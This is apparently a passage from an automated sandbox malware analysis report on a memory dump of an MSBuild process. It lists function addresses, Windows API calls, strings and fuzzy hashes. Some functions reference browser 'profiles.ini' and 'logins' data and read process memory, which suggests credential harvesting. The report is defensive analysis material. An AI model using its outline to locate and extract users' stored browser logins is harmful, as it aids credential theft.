SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
GetClientRect.USER32(?,?), ref: 0041433B
SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373

Strings

%s:, xrefs: 00414239
STATIC, xrefs: 004141E3
EDIT, xrefs: 00414219

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
String ID: %s:$EDIT$STATIC
API String ID: 2080319088-3046471546
Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16

Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON

Download Yara Rule

APIs

EndDialog.USER32(?,?), ref: 00413221
GetDlgItem.USER32(?,000003EA), ref: 00413239
SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
memset.MSVCRT ref: 00413292
memset.MSVCRT ref: 004132B4
memset.MSVCRT ref: 004132CD
memset.MSVCRT ref: 004132E1
memset.MSVCRT ref: 004132FB
memset.MSVCRT ref: 00413310
GetCurrentProcess.KERNEL32 ref: 00413318
ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
memset.MSVCRT ref: 004133C0
GetCurrentProcessId.KERNEL32 ref: 004133CE
memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
wcscpy.MSVCRT ref: 0041341F
_snwprintf.MSVCRT ref: 0041348E
SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
GetDlgItem.USER32(?,000003EA), ref: 004134B0
SetFocus.USER32(00000000), ref: 004134B7

Strings

Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
{Unknown}, xrefs: 004132A6

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
API String ID: 4111938811-1819279800
Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69

Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003EC), ref: 004011F0
ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
GetDlgItem.USER32(?,000003EE), ref: 00401238
ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
GetDlgItem.USER32(?,000003EC), ref: 00401273
ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
LoadCursorW.USER32(00000000,00000067), ref: 00401297
SetCursor.USER32(00000000,?,?), ref: 0040129E
GetDlgItem.USER32(?,000003EE), ref: 004012BF
ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
GetDlgItem.USER32(?,000003EC), ref: 004012E6
SetBkMode.GDI32(?,00000001), ref: 004012F2
SetTextColor.GDI32(?,00C00000), ref: 00401300
GetSysColorBrush.USER32(0000000F), ref: 00401308
GetDlgItem.USER32(?,000003EE), ref: 00401329
EndDialog.USER32(?,?), ref: 0040135E
DeleteObject.GDI32(?), ref: 0040136A
GetDlgItem.USER32(?,000003ED), ref: 0040138F
ShowWindow.USER32(00000000), ref: 00401398
GetDlgItem.USER32(?,000003EE), ref: 004013A4
ShowWindow.USER32(00000000), ref: 004013A7
SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
SetWindowTextW.USER32(?,00000000), ref: 004013CA
SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
String ID:
API String ID: 829165378-0
Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19

Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00404172

Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55

Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C

wcscpy.MSVCRT ref: 004041D6
wcscpy.MSVCRT ref: 004041E7
memset.MSVCRT ref: 00404200
memset.MSVCRT ref: 00404215
_snwprintf.MSVCRT ref: 0040422F
wcscpy.MSVCRT ref: 00404242
memset.MSVCRT ref: 0040426E
memset.MSVCRT ref: 004042CD
memset.MSVCRT ref: 004042E2
_snwprintf.MSVCRT ref: 004042FE
wcscpy.MSVCRT ref: 00404311

Strings

AE, xrefs: 0040432B, 0040433B, 00404346
Path, xrefs: 00404326
General, xrefs: 004041E1
EA, xrefs: 004041B8
profiles.ini, xrefs: 0040417D
IsRelative, xrefs: 00404341
Profile%d, xrefs: 0040421B, 004042F0

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
API String ID: 2454223109-1580313836
Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA

Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F

SetMenu.USER32(?,00000000), ref: 00411453
SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
GetModuleHandleW.KERNEL32(00000000), ref: 00411495
LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
ShowWindow.USER32(?,?), ref: 004115FE
GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7

Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3

Strings

/nosaveload, xrefs: 00411585
SysListView32, xrefs: 004114FA
xE, xrefs: 00411622
report.html, xrefs: 0041164A
commdlg_FindReplace, xrefs: 00411675

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
API String ID: 4054529287-3175352466
Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65

Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00414F40
memset.MSVCRT ref: 00414F55
wcscpy.MSVCRT ref: 00414F87
_snwprintf.MSVCRT ref: 00414FA7
wcscat.MSVCRT ref: 00414FB4
_snwprintf.MSVCRT ref: 00414FE3
wcscat.MSVCRT ref: 00414FF0
wcscat.MSVCRT ref: 00414FFE
wcscat.MSVCRT ref: 00415010
wcscat.MSVCRT ref: 0041501B
wcscat.MSVCRT ref: 0041502D
wcscat.MSVCRT ref: 0041503F

Strings

</font>, xrefs: 00415039
<b>, xrefs: 0041500A
<font, xrefs: 00414F81
</b>, xrefs: 00415027
color="#%s", xrefs: 00414FD2
size="%d", xrefs: 00414F96

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: wcscat$_snwprintfmemset$wcscpy
String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
API String ID: 3143752011-1996832678
Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D

Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7

Strings

NtQueryObject, xrefs: 004135A3
NtLoadDriver, xrefs: 0041355B
NtQuerySystemInformation, xrefs: 0041354E
NtUnloadDriver, xrefs: 0041356D
NtSuspendProcess, xrefs: 004135B5
NtResumeProcess, xrefs: 004135C7
ntdll.dll, xrefs: 0041353D
NtOpenSymbolicLinkObject, xrefs: 0041357F
NtQuerySymbolicLinkObject, xrefs: 00413591

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
API String ID: 667068680-2887671607
Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C

Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040FB7E
memset.MSVCRT ref: 0040FBA8
memset.MSVCRT ref: 0040FBBE
memset.MSVCRT ref: 0040FBD4
_snwprintf.MSVCRT ref: 0040FC0D
wcscpy.MSVCRT ref: 0040FC58
_snwprintf.MSVCRT ref: 0040FCE5
wcscat.MSVCRT ref: 0040FD17

Part of subcall function 00414E4E: _snwprintf.MSVCRT ref: 00414E72

wcscpy.MSVCRT ref: 0040FCF9
_snwprintf.MSVCRT ref: 0040FD56

Strings

<font color="%s">%s</font>, xrefs: 0040FCD8
<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s, xrefs: 0040FB86
<table border="1" cellpadding="5">, xrefs: 0040FC15
bgcolor="%s", xrefs: 0040FBFF
</table><p>, xrefs: 0040FD7A
nowrap, xrefs: 0040FC52
 , xrefs: 0040FD11

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: _snwprintfmemset$wcscpy$wcscat
String ID: bgcolor="%s"$ nowrap$ $</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
API String ID: 1607361635-601624466
Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55

Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004101C0
memset.MSVCRT ref: 004101D5
memset.MSVCRT ref: 004101EA
_snwprintf.MSVCRT ref: 00410219
_snwprintf.MSVCRT ref: 00410248
wcscpy.MSVCRT ref: 00410259
_snwprintf.MSVCRT ref: 00410279
memset.MSVCRT ref: 004102B8
_snwprintf.MSVCRT ref: 004102D9
_snwprintf.MSVCRT ref: 00410313

Part of subcall function 00414E4E: _snwprintf.MSVCRT ref: 00414E72

Strings

</font>, xrefs: 00410253
bgcolor="%s", xrefs: 00410208
<font color="%s">, xrefs: 00410237
<th%s>%s%s%s, xrefs: 00410302
<table border="1" cellpadding="5"><tr%s>, xrefs: 00410268
width="%s", xrefs: 004102C8

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: _snwprintf$memset$wcscpy
String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
API String ID: 2000436516-3842416460
Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66

Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999

GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
LoadIconW.USER32(00000000,00000072), ref: 004035CA
GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
LoadIconW.USER32(00000000,00000074), ref: 004035E4
GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
LoadIconW.USER32(00000000,00000073), ref: 004035F8
GetModuleHandleW.KERNEL32(00000000), ref: 00403607
LoadIconW.USER32(00000000,00000075), ref: 0040360C
GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
LoadIconW.USER32(00000000,0000006F), ref: 00403620
GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
LoadIconW.USER32(00000000,00000076), ref: 00403634
GetModuleHandleW.KERNEL32(00000000), ref: 00403643
LoadIconW.USER32(00000000,00000077), ref: 00403648
GetModuleHandleW.KERNEL32(00000000), ref: 00403657
LoadIconW.USER32(00000000,00000070), ref: 0040365C
GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
LoadIconW.USER32(00000000,00000078), ref: 00403670

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
String ID:
API String ID: 1043902810-0
Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929

Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
_snwprintf.MSVCRT ref: 0044488A
wcscpy.MSVCRT ref: 004448B4
??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964

Strings

CompanyName, xrefs: 0044490C
%4.4X%4.4X, xrefs: 0044487F
ProductName, xrefs: 004448BB
OriginalFileName, xrefs: 0044494B
FileVersion, xrefs: 004448E2
InternalName, xrefs: 00444921
LegalCopyright, xrefs: 00444936
\VarFileInfo\Translation, xrefs: 00444864
ProductVersion, xrefs: 004448F7
FileDescription, xrefs: 004448CD
040904E4, xrefs: 004448AE

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ??2@??3@_snwprintfwcscpy
String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
API String ID: 2899246560-1542517562
Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8

Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040DBCD
memset.MSVCRT ref: 0040DBE9

Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5

Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4

wcscpy.MSVCRT ref: 0040DC2D
wcscpy.MSVCRT ref: 0040DC3C
wcscpy.MSVCRT ref: 0040DC4C
EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
wcscpy.MSVCRT ref: 0040DCC3

Strings

Version, xrefs: 0040DC7F
TranslatorURL, xrefs: 0040DC69
general, xrefs: 0040DC41
strings, xrefs: 0040DCBD
TranslatorName, xrefs: 0040DC58
RTL, xrefs: 0040DC92

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
API String ID: 3330709923-517860148
Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE

Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON

Download Yara Rule

APIs

Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98

Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A

memset.MSVCRT ref: 0040806A
memset.MSVCRT ref: 0040807F
_wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
_wcsicmp.MSVCRT ref: 004081C3
memset.MSVCRT ref: 004081E4
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274

Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B

Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50

Strings

null, xrefs: 004081BB
logins, xrefs: 00408016

Memory Dump Source

Source File: 0000000C.00000002.1936430927.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd

Similarity

API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
String ID: logins$null
API String ID: 2148543256-2163367763
Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9

Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5

GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D

Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306

memset.MSVCRT ref: 004085CF
memset.MSVCRT ref: 004085F1
memset.MSVCRT ref: 00408606
strcmp.MSVCRT ref: 00408645
_mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
_mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
memset.MSVCRT ref: 0040870E
strcmp.MSVCRT ref: 0040876B
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6

Strings

---, xrefs: 00408765

Memory Dump Source

